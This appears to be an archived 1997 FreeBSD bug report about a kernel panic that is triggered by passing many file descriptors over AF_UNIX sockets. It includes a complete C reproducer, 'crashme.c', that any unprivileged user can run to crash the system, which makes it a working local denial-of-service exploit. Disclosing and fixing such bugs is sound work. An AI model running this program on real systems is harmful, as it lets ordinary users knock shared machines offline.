Date: Wed, 20 Aug 1997 14:33:54 -0700 (PDT) From: abelits@phobos.illtel.denver.co.us To: freebsd-gnats-submit@FreeBSD.ORG Subject: kern/4345: Kernel panic is caused by passing file descriptors through AF_UNIX socket Message-ID: <199708202133.OAA10663@hub.freebsd.org> Resent-Message-ID: <199708202140.OAA11120@hub.freebsd.org>
next in thread | raw e-mail | index | archive | help
>Number: 4345 >Category: kern >Synopsis: Kernel panic is caused by passing file descriptors through AF_UNIX socket >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Aug 20 14:40:00 PDT 1997 >Last-Modified: >Originator: Alex Belits >Organization: none >Release: FreeBSD 2.2.2-RELEASE i386 >Environment: FreeBSD es1840 2.2.2-RELEASE FreeBSD 2.2.2-RELEASE #0: Tue Jun 24 04:43:02 PDT 1 997 abelits@es1840:/usr/src/sys/compile/ES1840 i386 >Description: Sending large number of file descriptors through AF_UNIX sockets causes a kernel panic. The panic may occur if file descriptors are passed and then closed, although keeping them open and collecting them in the receiver process after receiving always causes panic. >How-To-Repeat: Run the following program as any regular user: --- 8< --- /* crashme.c ** ** THIS PROGRAM CAUSES KERNEL PANIC ON SOME SYSTEMS ** ** Usage: crashme [--harder] ** ** --harder option causes this program to leave opened file descriptors hanging ** thus increasing the probability of the crash. ** */ #include <stdio.h> #include <fcntl.h> #include <unistd.h> #include <errno.h> #include <sys/types.h> #include <sys/un.h> #include <sys/uio.h> #include <sys/socket.h> #include <sys/wait.h> int main(int argc,char **argv){ int harder=0,p,nproc,h,i,socketfds[2]; char a[10]; struct iovec iov1={a,1}; struct cmsghdr *cm; struct msghdr msg; char bbuffer[sizeof(struct cmsghdr)+sizeof(int)*24]; if(argc>=2&&!strcmp(argv[1],"--harder")) harder=1; nproc=-1; for(i=0;i<100;i++){ if(!(p=fork())){ if(socketpair(AF_UNIX,SOCK_STREAM,0,socketfds)){ perror("socketpair"); }else{ cm=(struct cmsghdr*)bbuffer; cm->cmsg_level=SOL_SOCKET; cm->cmsg_type=SCM_RIGHTS; cm->cmsg_len=sizeof(struct cmsghdr)+sizeof(int); msg.msg_name=(caddr_t)0; msg.msg_namelen=0; msg.msg_flags=0; msg.msg_iov=&iov1; msg.msg_iovlen=1; msg.msg_control=(caddr_t)cm; msg.msg_controllen=cm->cmsg_len; if(fork()){ close(socketfds[0]); *(int*)(bbuffer+sizeof(struct cmsghdr))=open("/dev/null",O_RDONLY); for(i=0;i<2048;i++){ fprintf(stderr,"%d> ",i+1); while(sendmsg(socketfds[1],&msg,0)!=1){ if(errno!=EAGAIN){ perror("\nsendmsg"); } } } }else{ close(socketfds[1]); for(i=0;i<2048;i++){ *(int*)(bbuffer+sizeof(struct cmsghdr))=-1; fprintf(stderr,">%d ",i+1); cm=(struct cmsghdr*)bbuffer; cm->cmsg_level=SOL_SOCKET; cm->cmsg_type=SCM_RIGHTS; cm->cmsg_len=sizeof(struct cmsghdr)+sizeof(int)*24; msg.msg_name=(caddr_t)0; msg.msg_namelen=0; iov1.iov_len=10; msg.msg_iov=&iov1; msg.msg_iovlen=1; msg.msg_control=(caddr_t)cm; msg.msg_controllen=cm->cmsg_len; if(recvmsg(socketfds[0],&msg,0)!=1){ perror("\nrecvmsg"); }else{ fprintf(stderr,"(%d) ",*(int*)(bbuffer+sizeof(struct cmsghdr))); if(!harder){ close(*(int*)(bbuffer+sizeof(struct cmsghdr))); } } } exit(0); } wait(&h); } exit(0); }else{ if(p<0){ nproc=i; i=100; } } } if(nproc<0) nproc=100; for(i=0;i<nproc;i++) wait(&h); fprintf(stderr,"\n%d processes finished\n",nproc); return 0; } --- >8 --- >Fix: none >Audit-Trail: >Unformatted:
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199708202133.OAA10663>